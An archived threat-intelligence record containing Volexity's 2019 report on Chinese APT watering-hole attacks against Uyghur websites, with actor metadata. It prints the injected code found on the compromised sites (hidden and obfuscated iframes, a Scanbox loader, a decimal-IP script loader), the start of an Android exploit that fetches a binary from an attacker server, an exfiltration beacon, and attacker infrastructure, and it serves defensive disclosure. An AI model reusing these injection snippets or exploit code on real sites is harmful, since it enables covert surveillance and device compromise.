{
	"id": "93f168fe-33c9-46e9-91e1-4ad39066987b",
	"created_at": "2026-04-06T00:06:59.649171Z",
	"updated_at": "2026-04-10T13:13:07.921426Z",
	"deleted_at": null,
	"sha1_hash": "ad91d3efae76faa98431bbe86aa84213bc217c7b",
	"title": "Digital Crackdown: Large-Scale Surveillance and Exploitation of Uyghurs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 435513,
	"plain_text": "Digital Crackdown: Large-Scale Surveillance and Exploitation of\r\nUyghurs\r\nBy mindgrub\r\nPublished: 2019-09-02 · Archived: 2026-04-05 12:49:32 UTC\r\nOver the last several years, numerous reports have emerged regarding the shocking treatment of Uyghurs, a Muslim\r\nminority ethnic group that makes up a large part of the Xinjiang Uyghur Autonomous Region (XUAR) in northwest China.\r\nThe Uyghur people, especially those that want the XUAR to become its own nation under the name East Turkistan, are\r\nconsidered to be a threat to the Chinese Communist Party (CCP). Recent reporting has shown that this point of view by the\r\nCCP against the Uyghur people has resulted in wide-scale harassment, relocation to detention camps, and oppressive high-tech surveillance aimed at tracking physical movements and behavior. With all of these reports on physical real-world\r\nissues, it should come as no surprise that cyberspace has become a battle ground for the Uyghur people. The level of\r\nsurveillance occurring in China against Uyghurs extends well beyond their borders and has fully entered the digital realm. In\r\nthis blog, Volexity plans to shed some light on the barrage of cyber attacks that have been unleashed upon Uyghurs.\r\nSince its formation in 2013, Volexity has worked closely with various non-governmental organizations (NGOs), activists,\r\ndissidents, human rights defenders, and other highly targeted groups that are often at a severe disadvantage with respect to\r\nthe threat actors that are targeting them. Volexity’s goal is to always level the playing field as much as possible through\r\nawareness and by collaboratively building more defensible and resilient networks and systems. Over the years, Volexity has\r\ngained amazing insight into what could be considered to be some of the most advanced and scariest cyber attacks\r\nimaginable.  
Volexity has worked closely with various Uyghur individuals and organizations and has witnessed an\r\nunrelenting series of attacks that started well before 2013 and continue to this day. In the last few years, Volexity has\r\nobserved an increase in the number of compromised Uyghur and East Turkistan websites. These websites have been\r\nleveraged to track and launch attacks against the Uyghur diaspora around the world. This report details the wide variety of\r\nwebsites that have been used for surveillance and attacks and specifically looks into a very recent campaign targeting mobile\r\ndevices.\r\nKey highlights from these most recent series of attacks against the Uyghur diaspora include:\r\nA wide-ranging series of digital surveillance and exploitation campaigns identified via multiple strategically\r\ncompromised websites\r\nMobile device users running Android OS targeted via an exploit that will deliver a 64-bit ARM executable\r\nWebsite visitors tracked and targeted via Scanbox profiling and exploitation framework\r\nAttacker’s arsenal includes Google Applications for gaining access to e-mails and contact lists of Gmail accounts via\r\nOAuth\r\nDoppelganger domains emulating Google, the Turkistan Times, and the Uyghur Academy leveraged by attackers\r\nAt least two separate Chinese APT groups responsible for ongoing campaigns against Uyghurs\r\nAs part of these ongoing attacks, Volexity has identified at least 11 Uyghur and East Turkistan related websites that have\r\nbeen compromised and leveraged for surveillance and exploitation. While this number is definitely less than that observed\r\nby Volexity as part of a mass digital surveillance campaign by OceanLotus a few years ago, these websites do make up a\r\nsignificant number of the total websites that provide Uyghur and East Turkistan news and resources. 
Volexity believes that\r\nthe attacks described in this post are designed to target Uyghurs at large, the majority of whom will be members of the\r\nUyghur diaspora. The systematic targeting and compromise of websites that are run by and cater to Uyghurs make it clear they\r\nare the primary targets. However, each of the compromised websites is banned by the Great Firewall in China, leaving\r\nlargely only those outside of the country as targets and potential victims.\r\nhttps://www.volexity.com/blog/2019/09/02/digital-crackdown-large-scale-surveillance-and-exploitation-of-uyghurs/\r\nPage 1 of 9\n\nCompromised Sites\r\nVolexity has been able to identify at least 11 different Uyghur and East Turkistan websites that have been strategically\r\ncompromised and leveraged as part of a series of attack campaigns. In some cases, the websites have been continuously\r\nleveraged to attack visitors going back at least four years. While it is not always possible to tie some observed activity to a\r\nspecific threat group, Volexity believes that at least two Chinese APT groups are responsible for the majority of the attack\r\nactivity described in this blog.\r\nOrganization | Website | Compromised Page\r\nUyghur Academy | www.akademiye.org | Main Index; /ug/wp-content/themes/goodnews/js/custom.js?ver=1.0; /ug/wp-content/themes/goodnews/js/Jplayer.html (iFrame)\r\nTurkistantimes | turkistantimes.com | Directly on select pages such as /en/news-10597.html and /m/news-10500.html\r\nUighur Times (English) | uighurtimes.com | Main Index\r\nUighur Times (Chinese) | weiwuer.com | Main Index\r\nUighur Times (Uyghur) | iuyghur.com | Main Index\r\nIstiqlal Haber | istiqlalhaber.com | /js/jquery.easing.1.3.js\r\nTurkistan Press | turkistanpress.com | /js/jquery.easing.1.3.js\r\nTurkistan TV | turkistantv.com | /js/lightbox/css/lightbox.html (iFrame)\r\nEast Turkistan Education and Solidarity Association (ETESA) | maarip.org | Main index pages for English and Uyghur versions of the website\r\nWorld Uyghurs Writers Union | wetinim.com | Main Index\r\nIstiqlal TV | istiqlal.net | Main index\r\nUnauthorized Code\r\nThe websites listed above all contained one or more instances of malicious code. The code was often updated over\r\ntime, and some websites even housed multiple different instances of malicious code at the same time. The majority of the\r\nwebsites that were linked to by the malicious code were unavailable when Volexity examined them or returned 0-byte\r\nresponses; the latter indicates that whitelisting may be employed or that the attack operation was otherwise on pause or\r\nbeing leveraged to simply track visitors. The primary instances where code was returned involved the deployment of\r\nScanbox by one actor and exploit code targeting Android users by another.\r\nEvil Eye\r\nIn many cases where the malicious websites were in operation but Volexity did not observe an active payload, the URLs\r\nfollowed a somewhat distinctive pattern. In almost all instances, the URLs from these sites were loaded via an iFrame.\r\nBelow is a list of the observed URL patterns, as extracted from the iFrame tags.\r\nhttp://103.43.18.243:5634/WU95IhiPIMsg.html\r\nhttp://182.61.171.167:9321/8fmtCI2j2Xk0.html\r\nhttp://182.61.173.209:8372/uxwrR64eZz0Y.html\r\nhttp://45.76.209.90:8352/reA4iy3gl2.html\r\nhttps://www.google-analysis.info/UxiZIwIcsta2.html\r\nhttps://www.google-analysis.info/NsyXHDkBR2yK.html\r\nhttps://turkistantlmes.com/aNQBEaMX2Bc4.html\r\nhttps://turkistantlmes.com/7GbMYn8ldTRK.html\r\nhttps://akademlye.org/t5UPArzQAjd2.html\r\nThese URLs are typically loaded in plaintext without any sort of obfuscation. However, in two instances, one of the earlier\r\ninstances identified on the Uyghur Academy website and one on the website of the World Uyghurs Writers Union,\r\nobfuscation was applied by way of multiple iFrames, with the URL itself being obfuscated. 
An example of the\r\nobfuscated code as found on the World Uyghurs Writers Union site is shown below.\r\n<iframe\r\nsrc=\"&#x68;&#x74;&#x74;&#x70;&#x3a;&#x2f;&#x2f;&#x31;&#x30;&#x33;&#x2e;&#x34;&#x33;&#x2e;&#x31;&#x38;&#x2e;&#x32;&#x34;&\r\nwidth=0 height=0></iframe>\r\nOnce decoded, the above iFrame will attempt to load content from http://103.43.18.243:5634/WU95IhiPIMsg.html.\r\nVolexity has also observed similar URL patterns and even doppelganger domains leveraged to target Tibetan interests as\r\nwell. Volexity believes there is likely overlap between these two sets of activity. Volexity currently tracks the above listed\r\nactivity as a group under the moniker Evil Eye. The Evil Eye threat actor is also responsible for targeting users with Android\r\nexploits and malware, which is detailed below within this report.\r\nScanbox\r\nAnother notable instance of code found on these compromised websites includes the aforementioned Scanbox instance that\r\nwas seen on istiqlal.net. The following code was observed on the site for a period of time in mid-April 2019.\r\n<script src=\"https://stats.uyghurmedia[.]top:443/i/?3\"></script>\r\nThe script would load the Scanbox framework, collecting data on the system and transmitting it via an HTTP POST request to\r\nstats.uyghurmedia[.]top:443/i/recv.php.\r\nIn this instance, the attackers leveraged both a domain they created in an effort to blend in as legitimate and TLS to evade\r\nnetwork detection. This domain also has ties to an operation designed to target Google OAuth access to Gmail accounts, as\r\ndescribed further in this report. This is not the first time Volexity has observed Scanbox leveraged in attacks against the\r\nUyghur community. 
In 2016, Volexity had identified a similar Scanbox instance on the Uyghur Academy website.\r\nIP in Decimal Notation\r\nOne of the more interesting versions of unauthorized code that Volexity observed was on the website of the World Uyghurs\r\nWriters Union. The following code was observed on the website:\r\n<script type=\"text/javascript\"> !function(a,b)\r\n{a=document.createElement(\"script\"),b=document.getElementsByTagName(\"script\")[0],\r\na.async=!0,a.src=\"//760037399/2\",b.parentNode.insertBefore(a,b)}()</script>\r\nIn this case, the value \"760037399\" converts to the Choopa IP address 45.77.64.23 and a request is made to the URL\r\nhttp://45.77.64.23/2. Volexity believes this code has primarily been leveraged for tracking, as it will ultimately report back a\r\nfew pieces of information to the site, including its referer and possibly even cookies. Volexity has previously observed this\r\nsame IP decimal notation and tracking code on other sites in the past.\r\nAndroid Mobile Users Targeted\r\nIn mid-August, Volexity identified new malicious code on the websites of the Uyghur Academy, Turkistan Press, Turkistan\r\nTV, and Istiqlal Haber. The websites contained a few different methods of loading the following code:\r\n<iframe src=\"https://akademlye[.]org/ztTXvf\" width 0 height 0 visibility hidden></iframe>\r\nThis malicious domain was designed to appear like the legitimate website of the Uyghur Academy. However, in this\r\ninstance the \"i\" has been replaced with a lowercase \"L.\" This follows a similar theme to that seen via the\r\n\"turkistantlmes[.]com\" website leveraged by the attackers. 
The code on this website appears to target the Chrome browser on\r\nthe Android operating system.\r\nThe initial code of the exploit contained the following, which was actually fairly well documented through comments:\r\n<html>\r\n<script>\r\nvar IP_A12A3079E14CED46E69BA52B8A90B21A = \"149.28.207.244\";\r\nvar IP_HEX_06236F18F5EA830A8DBB2AA5E5AC4E00 = \"0xf4cf1c95\";  // 4c08a8c0\r\nvar PORT_463C00141B4C3A7F76ACD3540052F8F5 = 8080;\r\nvar APP_PATH_D892A52BCC30FA6168C260B8695D24F7 = \"/data/data/com.android.browser/loader\";\r\nvar portshell=parseInt((PORT_463C00141B4C3A7F76ACD3540052F8F5/256+\r\n(PORT_463C00141B4C3A7F76ACD3540052F8F5%256)*256))*256*256+2;\r\nvar s=\"GET /dev/loader HTTP/1.0\\r\\nHost: \"+\r\nIP_A12A3079E14CED46E69BA52B8A90B21A+\":\"+PORT_463C00141B4C3A7F76ACD3540052F8F5.toString()+\"\\r\\nConnection: close\\r\\n\\r\\n\";\r\nThe exploit itself is 22,963 bytes of code and, if successful, will ultimately result in the forced download of a file named\r\nloader to the /data/data/com.android.browser directory of the victim device. This file is downloaded via the\r\nURL 149.28[.]207.244:8080/dev/loader. The file loader is a 64-bit ARM executable that exfiltrates a significant amount of\r\ndata about the device back to an attacker-controlled IP via an HTTP POST request to 149.28.207.244 over TCP port 1998. 
The\r\nconnection will use a hard-coded User-Agent of Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0)\r\nGecko/20100101 Firefox/65.0 for the request and will also notably send an Accept-Language of \"zh-CN\" (Chinese).\r\nThe information exfiltrated about the device includes the following:\r\nUnique ID\r\nModel\r\nBrand\r\nManufacturer\r\nLocale\r\nIMEI\r\nSIM state\r\nIMSI\r\nICCID\r\nPhone number\r\nRoaming status\r\nBaseband version\r\nCurrent network type\r\nCurrent network name\r\nOperator code\r\nBattery level\r\nWhether the phone is rooted\r\nROM version\r\nAndroid version\r\nAndroid API level\r\nAndroid patch version\r\nAndroid ID\r\nKernel version\r\nMAC address\r\nPublic and private IP addresses\r\nTotal and free space on SD card\r\nTotal and free RAM\r\nDevice fingerprint\r\nSerial number\r\nScreen resolution\r\nCPU\r\nUptime\r\nUsername\r\nThe malware binary also makes use of a unique website to check its IP address by making a GET request to the domain\r\ngetip[.]name (150.109.120.186). This website was registered in February 2019 and does not appear to have a web presence.\r\nThe site has been down on all occasions that Volexity has checked it. Additionally, there do not appear to be any other\r\nknown hostnames that resolve to the website’s IP address. Volexity believes it is possible that this domain is controlled by the\r\nattackers.\r\nThe malware attempts to log information about the status of exfiltration requests and other diagnostic information to a file\r\nnamed loader.log in the /data/data/com.android.browser directory on the device. While this file serves as a useful\r\nindicator of the presence of the malware, we note that the loader executable will continue functioning even if it cannot write\r\nto its log file. 
A sample of what a beacon packet looks like is included below.\r\nPOST /link/detail HTTP/1.1\r\nHost: 149.28.207.244\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0\r\nAccept: */*\r\nAccept-Language: zh-CN\r\nCache-Control: no-cache\r\nConnection: close\r\nContent-length: 976\r\n{\"device_id\":\"0f637264fc6318a92b9e13c65dc1cd2c\",\"model\":\"Android SDK built for arm64\",\"brand\":\"Android\",\"manufacturer\":\"unknown\",\"locale\":\"en-US\",\"imei\":\"358240051111123\",\"sim_state\":\"READY\",\"imsi\":\"310260000001809\",\"iccid\":\"89014103211138560721\",\"phone_no\":\"+15555215554\r\n11-\r\n05\",\"android_id\":\"d0a79d8f32e69c86\",\"kernel_version\":\"3.10.0+\",\"mac_address\":\"02:03:04:05:60:07\",\"ip_public\":\"\",\"ip_private\":\"\",\"sdcard_total\"\r\nkeys\",\"serial_no\":\"PD2C1PR328X0X23X0\",\"resolution\":\"1440*2560\",\"cpu_info\":\" AArch64 Processor rev 0 (aarch64)\",\"uptime\":\"1643\",\"user\":\"root\"}\r\nThe sample analyzed by Volexity does not appear to have any means of persisting on the system that it’s running on, nor\r\ndoes it appear to accept further commands. 
Volexity suspects that this may indicate that attackers may look to conduct future\r\nexploitation of devices of interest or are otherwise looking to use this data to verify information obtained from the output of\r\nphysical cellular device tracking.\r\nVolexity has identified similarities between the exploit being employed in this attack and the Chrome\r\nTurboFan remote code execution vulnerability that was reported via the SecuriTeam Secure Disclosure program and is\r\ncovered in an advisory here, but has not yet verified that they are the same.\r\nTargeting Gmail Access via Google OAuth\r\nAn increasingly common tactic that Volexity sees from various APT groups, especially those aimed at targeted populations,\r\nincluding dissidents and individuals involved with human rights, is to gain long-term access to their personal e-mail\r\naccounts. One such way is to develop an application and fool a targeted user into authorizing it to have access to their e-mail\r\naccount. This will typically bypass two-factor authentication (2FA) and provide the attacker resilience against user password\r\nchanges. Volexity previously described this type of attack and steps to mitigate it as part of a blog related to OceanLotus here.\r\nWhile investigating the domain name uyghurmedia[.]top, which was described above as targeting Uyghurs through Scanbox,\r\nVolexity found it was also being leveraged to target Gmail accounts via the hostname emailgroup.uyghurmedia.top.\r\nAccessing this hostname will result in a redirect to a Google application set up to gain unauthorized access to the Gmail\r\naccounts of Uyghurs. 
The application will warn you about what is about to happen, describe the permissions the application\r\nwould have over the account, and then make you confirm this is what you actually want to do, as shown in the image below.\r\nA closer look at the developer information of the application also gives insight into the account used to create and manage\r\nthe application, as seen below.\r\nThe attackers leveraged the e-mail address uygurye2008@gmail.com as part of this campaign. Any e-mail from this\r\naccount should be considered highly suspect and likely malicious. If access is granted, an e-mail should be sent and a new\r\nevent should show up under Google’s Security Checkup. The application in this instance will show up as the \"Uyghur Media\r\nEmail Group\" as seen below.\r\nFurthermore, the account is accessed nearly immediately from the Choopa IP address 45.32.190.160. Note: this is the\r\nsame IP address to which the above hostname resolves.\r\nAny access from this IP address should be considered suspect and likely malicious.\r\nPossible Ties to Apple iPhone Attacks\r\nLess than a week ago Google’s Project Zero posted a detailed analysis of a series of iPhone exploits and related malware\r\nthat had been identified by their Threat Analysis Group earlier in the year. This post does not give any specific details into\r\nwhere the exploits were observed but it does seem to hint that it may have been via Uyghur-related websites. 
A short time\r\nlater, TechCrunch ran an article confirming that Uyghurs were the targets and referencing a post by Forbes providing\r\nadditional details regarding the targeting of Android and Windows. While Volexity can only confirm malware targeting\r\nAndroid users through Uyghur websites, it is reasonable to suspect that these same attack campaigns could have easily been\r\nleveraged to target Apple and Microsoft users. Furthermore, Volexity has a couple of additional observations of note:\r\nShortly after Google’s Project Zero blog, the three DNS names leveraged by Evil Eye (akademlye.org,\r\nturkistantlmes.com, and google-analysis.info) stopped resolving\r\nAround the same time or shortly before this blog, a number of the websites Volexity lists as compromised above\r\nstarted showing Google Safe Browsing warnings in Google search results\r\nThe majority of the malicious scripts referenced on the compromised websites were removed in this same timeframe\r\nFinally, Volexity also observed one notable bit of code that was short-lived on the Uyghur Academy website that may\r\nindicate a possible interest in targeting iPhone users. The following code was observed in October 2018:\r\n<iframe src=\"http://app.msap[.]services/appsstore\" style=\"\r\nwidth: 0px;\r\nheight:0px;\r\nborder:none;\r\npadding:0;\r\n\"></iframe>\r\nWhile this is not a smoking gun, it is interesting to note the use of \"appsstore\" as part of the URL. 
Volexity also notes that it\r\nhas seen the msap.services domain leveraged to target Tibetan individuals as well.\r\nAttacker Infrastructure\r\nHostname | IPv4 Address | Notes\r\nwww.google-analysis[.]info | 182.61.106.160 | Attacker controlled domain found on multiple Uyghur and East Turkistan websites.\r\nturkistantlmes[.]com | 182.61.189.138 | Attacker controlled domain found on multiple Uyghur and East Turkistan websites.\r\nakademlye[.]org | 149.28.207.244 | Attacker controlled domain leveraged to deliver the Android exploit and malware. The IP for this domain is also used for direct communication from the Evil Eye Android loader.\r\najax.cloudflarestatic.tk | N/A | Malicious domain found on the compromised ETESA site maarip.org; currently does not resolve to an IP address.\r\napp.msap.services | 144.202.59.23 | Malicious domain previously observed on the compromised Uyghur Academy website akademiye.org.\r\narkinixik.ezua.com | 149.248.57.231 | Hostname observed in a malicious URL found on the compromised East Turkistan news website istiqlalhaber.com. This hostname is also tied to a series of other hostnames and domains used to target Uyghurs going back over five years.\r\nstats.uyghurmedia.top | 139.180.223.184 | Hostname observed hosting Scanbox via istiqlal.net in April 2019.\r\ngetip.name | 150.109.120.186 | Domain used by the Android malware to identify its public IP address.\r\nemailgroup.uyghurmedia.top | 45.32.190.160 | Hostname found to be leveraged to trick users into giving OAuth access to their Gmail accounts.\r\nd.scanvpn.com | 142.4.50.213 | The IP address was observed in a malicious URL found on the compromised ETESA site maarip.org. The hostname d.scanvpn.com also resolves to this IP address. This is believed to be quite old.\r\nN/A | 182.61.184.33 | Previous IP address resolution for turkistantlmes.com.\r\nN/A | 182.61.171.167 | IP address observed in a malicious URL found on the compromised website istiqlalhaber.com.\r\nN/A | 182.61.173.209 | IP address observed in a malicious URL found on the compromised website akademiye.org.\r\nN/A | 182.61.176.128 | Previous IP address resolution for turkistantlmes.com.\r\nN/A | 45.76.209.90 | IP address observed in a malicious URL found on the compromised website akademiye.org.\r\nN/A | 45.77.64.23 | IP address observed in a malicious URL found on the compromised site wetinim.com.\r\nNetwork Signature\r\nIn addition to the domains and IP addresses, the following network signature can be used to detect the Evil Eye Android\r\nmalware.\r\nalert http $HOME_NET any -> $EXTERNAL_NET any (msg:\"Volex - Evil Eye Android Malware Beacon\"; flow:to_server,established; content:\"POST\"; http_method; content:\"Mozilla/5.0 (Windows NT 10.0|3b| Win64|3b| x64|3b| rv:65.0) Gecko/20100101 Firefox/65.0\"; http_user_agent; content:\"Accept-Language: zh-CN\"; http_header; content:\"device_id\"; http_client_body; depth:15; sid:2019090101;)\r\nConclusion\r\nThe Uyghur population is and will continue to be a major target for Chinese APT groups. While Uyghurs living within\r\nChina are already subject to numerous forms of physical and electronic surveillance, it is reasonable to expect they have also\r\nbeen targeted for digital surveillance. However, as the sites listed in this post are actually blocked in China, it can be seen\r\nthat the Uyghur diaspora around the world are also primary targets of these digital surveillance operations. These operations\r\ncan be used to track the movements of Uyghurs outside of China and spy on those they are communicating with. 
Volexity\r\nbelieves that China has continued to increase the level of effort and sophistication it has put into targeting Uyghurs. As a\r\nresult, it is critically important that Uyghurs take into consideration when using their computers and mobile devices that they\r\nmay have been targeted and compromised, especially if the websites listed above are frequented.\r\nSource: https://www.volexity.com/blog/2019/09/02/digital-crackdown-large-scale-surveillance-and-exploitation-of-uyghurs/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.volexity.com/blog/2019/09/02/digital-crackdown-large-scale-surveillance-and-exploitation-of-uyghurs/"
	],
	"report_names": [
		"digital-crackdown-large-scale-surveillance-and-exploitation-of-uyghurs"
	],
	"threat_actors": [
		{
			"id": "f0ebaf6d-5e1a-4ed7-aa2c-0e69a648acea",
			"created_at": "2022-10-25T16:07:23.597455Z",
			"updated_at": "2026-04-10T02:00:04.683154Z",
			"deleted_at": null,
			"main_name": "Evil Eye",
			"aliases": [],
			"source_name": "ETDA:Evil Eye",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "af509bbb-8d18-4903-a9bd-9e94099c6b30",
			"created_at": "2023-01-06T13:46:38.585525Z",
			"updated_at": "2026-04-10T02:00:03.030833Z",
			"deleted_at": null,
			"main_name": "APT32",
			"aliases": [
				"OceanLotus",
				"ATK17",
				"G0050",
				"APT-C-00",
				"APT-32",
				"Canvas Cyclone",
				"SeaLotus",
				"Ocean Buffalo",
				"OceanLotus Group",
				"Cobalt Kitty",
				"Sea Lotus",
				"APT 32",
				"POND LOACH",
				"TIN WOODLAWN",
				"Ocean Lotus"
			],
			"source_name": "MISPGALAXY:APT32",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "870f6f62-84f5-48ca-a18e-cf2902cd6924",
			"created_at": "2022-10-25T15:50:23.303818Z",
			"updated_at": "2026-04-10T02:00:05.301184Z",
			"deleted_at": null,
			"main_name": "APT32",
			"aliases": [
				"APT32",
				"SeaLotus",
				"OceanLotus",
				"APT-C-00",
				"Canvas Cyclone"
			],
			"source_name": "MITRE:APT32",
			"tools": [
				"Mimikatz",
				"ipconfig",
				"Kerrdown",
				"Cobalt Strike",
				"SOUNDBITE",
				"OSX_OCEANLOTUS.D",
				"KOMPROGO",
				"netsh",
				"RotaJakiro",
				"PHOREAL",
				"Arp",
				"Denis",
				"Goopy"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "52973e5f-9656-4b60-b7f8-457e32ac4bbe",
			"created_at": "2023-01-06T13:46:39.056888Z",
			"updated_at": "2026-04-10T02:00:03.198866Z",
			"deleted_at": null,
			"main_name": "POISON CARP",
			"aliases": [
				"Evil Eye",
				"Red Dev 16",
				"Earth Empusa"
			],
			"source_name": "MISPGALAXY:POISON CARP",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d2a5c949-7ae0-4610-8bb8-047ab03b1574",
			"created_at": "2022-10-25T16:07:24.064197Z",
			"updated_at": "2026-04-10T02:00:04.856578Z",
			"deleted_at": null,
			"main_name": "Poison Carp",
			"aliases": [
				"Earth Empusa",
				"Evil Eye",
				"EvilBamboo",
				"Poison Carp",
				"Red Dev 16",
				"Sentinel Taurus"
			],
			"source_name": "ETDA:Poison Carp",
			"tools": [
				"ActionSpy",
				"AxeSpy",
				"BADSIGNAL",
				"BADSOLAR",
				"BadBazaar",
				"IRONSQUIRREL",
				"IceCube",
				"MOONSHINE",
				"PoisonCarp"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "5da6b5fd-1955-412a-81aa-069fb50b6e31",
			"created_at": "2025-08-07T02:03:25.116085Z",
			"updated_at": "2026-04-10T02:00:03.668978Z",
			"deleted_at": null,
			"main_name": "TIN WOODLAWN",
			"aliases": [
				"APT32 ",
				"Cobalt Kitty",
				"OceanLotus",
				"WOODLAWN "
			],
			"source_name": "Secureworks:TIN WOODLAWN",
			"tools": [
				"Cobalt Strike",
				"Denis",
				"Goopy",
				"JEShell",
				"KerrDown",
				"Mimikatz",
				"Ratsnif",
				"Remy",
				"Rizzo",
				"RolandRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "2439ad53-39cc-4fff-8fdf-4028d65803c0",
			"created_at": "2022-10-25T16:07:23.353204Z",
			"updated_at": "2026-04-10T02:00:04.55407Z",
			"deleted_at": null,
			"main_name": "APT 32",
			"aliases": [
				"APT 32",
				"APT-C-00",
				"APT-LY-100",
				"ATK 17",
				"G0050",
				"Lotus Bane",
				"Ocean Buffalo",
				"OceanLotus",
				"Operation Cobalt Kitty",
				"Operation PhantomLance",
				"Pond Loach",
				"SeaLotus",
				"SectorF01",
				"Tin Woodlawn"
			],
			"source_name": "ETDA:APT 32",
			"tools": [
				"Agentemis",
				"Android.Backdoor.736.origin",
				"AtNow",
				"Backdoor.MacOS.OCEANLOTUS.F",
				"BadCake",
				"CACTUSTORCH",
				"CamCapture Plugin",
				"CinaRAT",
				"Cobalt Strike",
				"CobaltStrike",
				"Cuegoe",
				"DKMC",
				"Denis",
				"Goopy",
				"HiddenLotus",
				"KOMPROGO",
				"KerrDown",
				"METALJACK",
				"MSFvenom",
				"Mimikatz",
				"Nishang",
				"OSX_OCEANLOTUS.D",
				"OceanLotus",
				"PHOREAL",
				"PWNDROID1",
				"PhantomLance",
				"PowerSploit",
				"Quasar RAT",
				"QuasarRAT",
				"RatSnif",
				"Remy",
				"Remy RAT",
				"Rizzo",
				"Roland",
				"Roland RAT",
				"SOUNDBITE",
				"Salgorea",
				"Splinter RAT",
				"Terracotta VPN",
				"Yggdrasil",
				"cobeacon",
				"denesRAT",
				"fingerprintjs2"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434019,
	"ts_updated_at": 1775826787,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ad91d3efae76faa98431bbe86aa84213bc217c7b.pdf",
		"text": "https://archive.orkl.eu/ad91d3efae76faa98431bbe86aa84213bc217c7b.txt",
		"img": "https://archive.orkl.eu/ad91d3efae76faa98431bbe86aa84213bc217c7b.jpg"
	}
}